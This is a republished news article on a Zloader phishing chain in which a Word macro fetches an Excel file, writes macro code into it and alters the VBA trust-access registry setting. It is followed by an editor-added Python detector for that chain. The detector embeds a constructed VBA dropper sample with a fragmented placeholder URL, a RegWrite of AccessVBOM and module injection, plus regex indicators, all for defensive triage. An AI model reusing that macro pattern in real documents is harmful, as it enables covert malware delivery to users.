{"id":42261,"date":"2021-07-09T13:35:47","date_gmt":"2021-07-09T13:35:47","guid":{"rendered":"http:\/\/icloud.pe\/blog\/?guid=7bd941f85d43b9497a4151c12d746238"},"modified":"2021-07-09T13:35:47","modified_gmt":"2021-07-09T13:35:47","slug":"new-zloader-malware-technique-makes-it-harder-to-spot-phishing-emails","status":"publish","type":"post","link":"https:\/\/icloud.pe\/blog\/new-zloader-malware-technique-makes-it-harder-to-spot-phishing-emails\/","title":{"rendered":"New Zloader malware technique makes it harder to spot phishing emails"},"content":{"rendered":"<p><span class=\"field field-name-field-author field-type-node-reference field-label-hidden\"><br \/>\n      <span class=\"field-item even\"><a href=\"https:\/\/www.cloudpro.co.uk\/authors\/keumars-afifi-sabet-0\">Keumars Afifi-Sabet<\/a><\/span><br \/>\n  <\/span><\/p>\n<div class=\"field field-name-field-published-date field-type-datetime field-label-hidden\">\n<div class=\"field-items\">\n<div class=\"field-item even\"><span class=\"date-display-single\">9 Jul, 2021<\/span><\/div>\n<\/div>\n<\/div>\n<div class=\"field field-name-body\">\n<p>Hackers have been discovered using a new phishing technique that chains a sequence of commands to hide malicious content and make email attachments appear harmless to filters.<\/p>\n<p>The technique involves <a href=\"https:\/\/www.itpro.co.uk\/security\/29093\/what-is-phishing\"  data-cke-saved-href=\"https:\/\/www.itpro.co.uk\/security\/29093\/what-is-phishing\">sending a phishing email<\/a> containing a seemingly innocuous Microsoft Word attachment, <a href=\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/zloader-with-a-new-infection-technique\/\"  data-cke-saved-href=\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/zloader-with-a-new-infection-technique\/\">according to McAfee<\/a>.\u00a0Once opened, it 
triggers a chain of events that eventually downloads the\u00a0payload for the infamous banking and data exfiltration malware known as <a href=\"https:\/\/www.itpro.co.uk\/security\/phishing\/355810\/zloader-malware-returns-as-a-coronavirus-phishing-scam\" data-cke-saved-href=\"https:\/\/www.itpro.co.uk\/security\/phishing\/355810\/zloader-malware-returns-as-a-coronavirus-phishing-scam\">Zloader<\/a>.<\/p>\n<p>Because the Word document carries no malicious payload itself, only a macro that fetches one, it is more likely to pass initial checks and malware scanners.<\/p>\n<p>Researchers noted that users are only exposed if macros are enabled: the attack relies on a macro to trigger a series of commands once the Word document is opened.<\/p>\n<p>Macros are disabled by default in <a href=\"https:\/\/www.itpro.co.uk\/desktop-software\/19337\/office-365-review\" >Microsoft Office<\/a>, so the Word document contains a lure designed to trick users into enabling them, claiming that otherwise the file won\u2019t load correctly.<\/p>\n<p>When the Word document opens with macros enabled, the macro downloads and opens a second, password-protected Microsoft Excel file from a remote server.<\/p>\n<p>The Word document contains combo box components that store everything needed to reach the remote Excel document: the Excel object, the URL, and the password required to open the file. The URL is stored in the combo box\u00a0as a set of broken string fragments that are concatenated at run time, so the complete URL never appears as a single string anywhere in the document.<\/p>\n<p>The code then attempts to download and open the Excel file hosted on the malicious domain. After extracting the contents of the Excel cells, the Word macro creates a Visual Basic for Applications (VBA) module in the downloaded Excel file and writes the retrieved contents into it. 
In effect, it copies the cell contents into the Excel file as macro code.<\/p>\n<p>Once the macro has been written, it modifies a registry key that governs trust access to the VBA project object model on the victim\u2019s device, so that the newly created module can be used without any Microsoft Office warnings. With the macro written and the trust-access setting changed, a function from the new Excel VBA is called, and that function downloads the Zloader payload.<\/p>\n<p>\u201cMalicious documents have been an entry point for most malware families and these attacks have been evolving their infection techniques and obfuscation, not just limiting to direct downloads of payload from VBA, but creating agents dynamically to download payload,\u201d McAfee\u2019s researchers Kiran Raj and Kishan N wrote.<\/p>\n<p>\u201cUsage of such agents in the infection chain is not only limited to Word or Excel, but further threats may use other living off the land tools to download its payloads. Due to security concerns, macros are disabled by default in Microsoft Office applications. We suggest it is safe to enable them only when the document received is from a trusted source.\u201d<\/p>\n<p>The operators of the Zloader malware are notorious for finding increasingly innovative ways of spreading their banking Trojan. The malware was <a href=\"https:\/\/www.itpro.co.uk\/security\/phishing\/355810\/zloader-malware-returns-as-a-coronavirus-phishing-scam\">found to be present in 100 coronavirus-related email campaigns<\/a> as of the first half of 2020. 
Zloader was also hiding within encrypted Excel documents, according to research published in March 2021, with its <a href=\"https:\/\/www.itpro.co.uk\/security\/malware\/358806\/invoice-zloader-campaign-hides-within-encrypted-excel-docs\">operators overseeing invoice-related spam campaigns<\/a>.<\/p>\n<\/div>\n","protected":false},"excerpt":{"rendered":"<p>      Keumars Afifi-Sabet<\/p>\n<p>        9 Jul, 2021    <\/p>\n<p>      Hackers have been discovered using a new phishing technique that involves using a sequence of chained commands to hide malicious content and make email attachments appear harmless to filte&#8230;<\/p>\n","protected":false},"author":433,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[],"tags":[],"class_list":["post-42261","post","type-post","status-publish","format-standard","hentry"],"_links":{"self":[{"href":"https:\/\/icloud.pe\/blog\/wp-json\/wp\/v2\/posts\/42261","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/icloud.pe\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/icloud.pe\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/icloud.pe\/blog\/wp-json\/wp\/v2\/users\/433"}],"replies":[{"embeddable":true,"href":"https:\/\/icloud.pe\/blog\/wp-json\/wp\/v2\/comments?post=42261"}],"version-history":[{"count":1,"href":"https:\/\/icloud.pe\/blog\/wp-json\/wp\/v2\/posts\/42261\/revisions"}],"predecessor-version":[{"id":42262,"href":"https:\/\/icloud.pe\/blog\/wp-json\/wp\/v2\/posts\/42261\/revisions\/42262"}],"wp:attachment":[{"href":"https:\/\/icloud.pe\/blog\/wp-json\/wp\/v2\/media?parent=42261"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/icloud.pe\/blog\/wp-json\/wp\/v2\/categories?post=42261"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/icloud.pe\/blog\/wp-json\/
wp\/v2\/tags?post=42261"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
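Triage logic for the infection chain the article describes (fragmented strings in the Word document, a second password-protected Excel workbook opened from a URL, a VBA module written into it, a registry change to the VBA trust-access setting, and the written macro then run). This is an added example by the editor, not code from the article or from McAfee's research. The VBA text is a constructed sample that mirrors those steps, the domain example.invalid is a placeholder, and the registry value name AccessVBOM is the well-known Office setting for "Trust access to the VBA project object model"; the article itself only says the macro changes "a RegKey" for trust access and does not name the value. The detector first re-joins the `&`-concatenated string literals and only then matches indicators, because on the raw source the URL and the Excel ProgID do not exist as single strings.

```python
"""Static triage of extracted VBA source for a Word-to-Excel macro dropper chain.

Added example: SAMPLE_VBA and BENIGN_VBA are hand-written, constructed inputs, not
recovered malware. example.invalid is a placeholder host. The AccessVBOM value name is
the editor's knowledge of the Office trust-access setting, not taken from the article.
"""
import re
from dataclasses import dataclass

# Constructed sample: the URL, the Excel ProgID and the password are split into
# fragments joined with "&", as the article says the combo-box strings are.
SAMPLE_VBA = r'''
Private Sub Document_Open()
    Dim u As String, p As String
    u = "http:" & "//exa" & "mple.inv" & "alid/" & "inv.xls"
    p = "op" & "en" & "123"
    Set xl = CreateObject("Exc" & "el.Appl" & "ication")
    xl.Visible = False
    Set wb = xl.Workbooks.Open(u, Password:=p)
    Set sh = CreateObject("WScript.Shell")
    sh.RegWrite "HKCU\Software\Microsoft\Office\16.0\Excel\Security\AccessVBOM", 1, "REG_DWORD"
    Set m = wb.VBProject.VBComponents.Add(1)
    m.CodeModule.AddFromString wb.Sheets(1).Cells(1, 1).Value
    xl.Run "Go"
End Sub
'''

# Constructed benign macro: formats a sheet and nothing else.
BENIGN_VBA = r'''
Sub FormatReport()
    Range("A1:D1").Font.Bold = True
    Columns("A:D").AutoFit
End Sub
'''

STRING_LIT = r'"(?:[^"\n]|"")*"'   # one VBA string literal; "" is an escaped quote
CONCAT_RUN = re.compile(rf'{STRING_LIT}(?:\s*&\s*{STRING_LIT})+')
URL_RE = re.compile(r'https?://[^\s"\']+', re.I)

# Behaviours from the described chain, matched on the de-fragmented source.
INDICATORS = {
    "remote_office_object":    re.compile(r'CreateObject\(\s*"Excel\.Application"', re.I),
    "password_protected_open": re.compile(r'Workbooks\.Open\([^)\n]*Password:=', re.I),
    "registry_write":          re.compile(r'\bRegWrite\b', re.I),
    "vbom_trust_access":       re.compile(r'Security\\AccessVBOM', re.I),
    "writes_vba_module":       re.compile(r'VBComponents\.Add|CodeModule\.(?:AddFromString|InsertLines)', re.I),
    "runs_written_macro":      re.compile(r'\.Run\s+"', re.I),
}


def join_fragments(src: str) -> str:
    """Collapse every run of "&"-joined string literals into a single literal.

    This undoes the fragmentation so URL and ProgID checks run on the string
    the macro would build at run time rather than on the scattered pieces.
    """
    def _join(m: re.Match) -> str:
        parts = re.findall(STRING_LIT, m.group(0))
        inner = ''.join(p[1:-1].replace('""', '"') for p in parts)
        return '"' + inner.replace('"', '""') + '"'
    return CONCAT_RUN.sub(_join, src)


@dataclass
class Finding:
    urls: list        # URLs that are visible only after fragments are re-joined
    hits: dict        # indicator name -> first matching text
    suspicious: bool  # writes a VBA module into a second workbook it opened


def analyse(vba_src: str) -> Finding:
    deob = join_fragments(vba_src)
    hits = {name: m.group(0) for name, rx in INDICATORS.items() if (m := rx.search(deob))}
    urls = sorted(set(URL_RE.findall(deob)))
    # The defining step of the chain is writing macro code into a second Office
    # document; pair it with either a recovered URL or an Excel automation object.
    suspicious = "writes_vba_module" in hits and ("remote_office_object" in hits or bool(urls))
    return Finding(urls, hits, suspicious)


if __name__ == "__main__":
    for label, src in (("sample", SAMPLE_VBA), ("benign", BENIGN_VBA)):
        f = analyse(src)
        print(f"{label}: suspicious={f.suspicious} urls={f.urls}")
        for name, text in f.hits.items():
            print(f"  {name}: {text}")
```

Feed it VBA text that has already been extracted from the document (for example with olevba from oletools) rather than the binary file. The re-join pass is what separates this from a plain grep: on the raw sample `URL_RE` finds nothing at all, and `CreateObject("Excel.Application")` only appears once the three fragments are concatenated.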